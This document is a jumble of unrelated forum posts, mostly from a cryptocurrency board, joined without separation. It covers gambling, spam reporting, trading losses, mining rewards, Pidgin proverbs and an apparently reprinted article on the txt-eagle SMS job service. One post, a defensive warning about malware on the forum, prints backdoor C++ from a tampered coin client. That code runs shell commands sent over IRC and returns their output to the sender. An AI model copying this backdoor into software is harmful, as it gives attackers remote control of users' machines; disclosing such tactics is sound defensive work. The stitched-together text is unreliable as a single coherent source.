Personally, I don't like the word Gambler tbh. And it feels more worse when someone calls someone a Gambler in the local language. I played some hands it's true and I tested many games for test purposes But I was never affected by the gamble. and I consider I am not a gambler myself. Somehow I do not feel good or something does not fit with me by this word.

What do you think about yourself and how do you want to define the word Gambler?
Well for my self I do see my self as a gambler do you see your self as one??

This thread will act as a reference for the tags I intend to use on some of the spammers and spam bots on this board. If you know of a user that creates duplicates, spams with worthless social media topics, uses the board to gain Activity points, or spreads hate with issues related to politics.

Report meaningless and spammers in this thread - we didn't battle for the local board for years only to have them come in and ruin it.

No rank is excluded - if you're wearing a signature and avatar and shitposting in Pidgin to complete your post count, you best stop or I'll stop for you.

Please help me report them here let's clean the board together.

« on: February 25, 2023, 11:37:19 AM »
Most bounty campaigns in these forums are not working some are old ones
Sorry to say but in some forums like Bitcointalk, Bitcoingurd, crypto talk, and all that, please sir can we have more of them in these forums it will be a great opportunity. And this forum should not just be only talks and topics about coins and I think getting some small cash flow should be fun in the group it is an opportunity to be in this forum

Mobile work
A way to earn money by texting
Oct 28th, 2010 | NEW YORK

The idea came to Nathan Eagle, a research scientist with the Massachusetts Institute of Technology when he was doing a teaching stint in rural Kenya. He realized that, as three-quarters of the 4.6 billion mobile-phone users worldwide live in developing countries, a useful piece of technology is now being placed in the hands of a large number of people who might be keen to use their devices to make some money. To help them do so, he came up with a service called txt-eagle which distributes small jobs via text messaging in return for small payments.

Only 18% of people in the developing world have access to the internet, but more than 50% owned a mobile-phone handset at the end of 2009 (a number which has more than doubled since 2005), according to the International Telecommunication Union. One study shows that adding ten mobile phones per 100 people in a typical developing country boosts growth in GDP per person by 0.8 percentage points.

Mr. Eagle hopes txt-eagle will do its bit by mobile “crowdsourcing”—breaking down jobs into small tasks and sending them to lots of individuals. These jobs often involve local knowledge and range from things like checking what street signs say in rural Sudan for a satellite-navigation service to translating words into a Kenyan dialect for companies trying to spread their marketing. A woman living in rural Brazil or India may have limited access to work, adds Mr. Eagle, “but she can still use her mobile phone to collect local price and product data or even complete market-research surveys.” Payments are transferred to a user’s phone by a mobile money service, such as the M-PESA system run by Safaricom in Africa, or by providing additional calling credit.

Working with over 220 mobile operators,txeaglee can reach 2 billion subscribers in 80 countries. It already has the largest contract-labor force in Kenya and new ways of using it are being found all the time. Recently a large media firm asked Mr. Eagle for help in monitoring its television commercials across Africa. The company was concerned that, although it had paid for broadcasting rights, its ads could be replaced with others by local television companies. So txt-eagle pays locals to watch and then text notes about which ads are shown. “I would never think of that myself,” says Mr. Eagle. This is why he is not sure just how big all these small text jobs could become.

As the COVID-19 pandemic slowly lowers down here in the city, mass gatherings are allowed once again provided that we still have to follow minimum public health standards such as wearing face masks, etc.

A gentleman I learned to an extent who possesses a review headquarters for civil service examinees, understands that I am into Bitcoin and cryptocurrencies. He called me yesterday, asking if I am functional to be a guest lecturer to his students in enlightening them about Bitcoin when the entrance of classes commences next month. Not just BTC, but the evolving and expanding crypto industry like DeFi, NFTs, metaverse, altcoins, etc.

This is going to be the first time I am enlightening the multitudes physically after 2 years of COVID-19 pandemic constraints. Of course, I am happy and excited to eventually do this again in front of many people (not practically). Hopefully, this is a new advent for me to finally resume being a crypto lecturer once again.

Nigerian Languages / African proverbs in pidig?
« on: January 23, 2023, 03:14:15 PM »
I have been meaning to do this for a while now but each time I get distracted and laggard. I want us to have an avenue of sharing some of our indigenous proverbs while still learning the crypto stuff.

— E don tey wey I be dey plan to do this thing here but each time too much distractions dey carry my mind comot from am. I go like make our area people share some of our local proverbs here with their explanations. I go put the proverbs in bold.

Share a proverb, and then put up its meaning. It will be best if the proverb is written in pidgin English.

Make I kick start am with some Warri flavour. Area!

Nor be today wey yansh don dey back.
Meaning: We are used to such a situation.

Dem nor dey tell blind man sey salt nor dey soup, you fit tell am sey oil nor dey.
Meaning: Obvious things don't need explanations

Cryptocurrency Trading / Tutored or learned how to trade
« on: January 23, 2023, 12:55:30 PM »
For newbie traders to learn.

I want to have a broader knowledge about this because I do not want to be discussing partially about what I did when I wanted to learn crypto trading.

First thing first, this is what I did.
I learn trading myself, using articles and videos from trading sites. It was fun for me because I like to learn if it is about what could earn me money.

After learning trading, I trade. I learn derivative trading as well. But what later happened was that I was losing. I do lost in gambling since 2014 until I had control over it, gambling took money from me, but I had more money in 2019 and trading has taking more from me until I gained more experience about what trading is before my losses reduced and profit increases.

How about you people that had a tutor, were you able to be taught in a way you do not lose in the beginning? I only started to make profit some months ago and till now though, but I lost for almost 2 to 3 years. Maybe tutoring can help to avoid losses?

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
   CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      CFree(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
   }
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
   FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      pclose(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
   }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

I was lucky enough to be around Bitcoin mining when the rewards were sky-high and the competition wasn't as fierce. But as time has passed and the difficulty has skyrocketed. It's become almost impossible to turn a profit with mining. I still remember when I first got my S9 and it was bringing in a cool $25-$100 per day, but those days are long gone and the rewards just aren't what they used to be.

I've been thinking a lot about what will happen when the block reward subsidy drops below 2 BTC in a little over 5 years. According to the original white paper, the goal was for fees to eventually overtake the subsidy, but there was no specific timeline given. If the price of Bitcoin is high enough to make up for the lower subsidy with miner fees, it could cost an exorbitant amount to send Bitcoin. This could put pressure toward using centralized services like exchanges and WatchTowers on the Lightning Network for using Bitcoin. If the cost of sending Bitcoin remains low, mining will become more and more reliant on cheap electricity.

It's hard to predict exactly what will happen, but I'm curious to hear what others think. What do you think will happen when the block reward subsidy is 1.5625 BTC in a little over 5 years?

today as usual I went shopping to my neighbor's shop, to buy groceries, for daily needs.
and when I got to the store I saw the shopkeeper holding a cellphone,
and at that time he immediately asked me and while pointing at his cell phone, and said what ad is this, ma'am? and at that time I immediately smiled, apparently on his cellphone there was an advertisement for an application for buying and selling bitcoin and crypto. and at that time I explained that it was an advertisement for buying and selling bitcoin exchanges. and at that time he asked me what is cryptocurrencies? and I explained to him as best I could that bitcoin is an asset for the future, and we can invest in it, and I also explained that I also invest in cryptocurrencies, and after that he finally got interested in investing in cryptocurrencies, and downloaded the exchange app and he immediately ask to be guided by me to buy cryptocurrencies, and to be honest I'm happy because my neighbors invest in cryptocurrencies just like me..

and I also before he invested, had warned him earlier, that investing in bitcoin is very risky, profit and loss.
and i also suggest to join this forum to learn more about bitcoin.

because honestly I myself am still a beginner. what do you think everything i do
is it wrong or not?
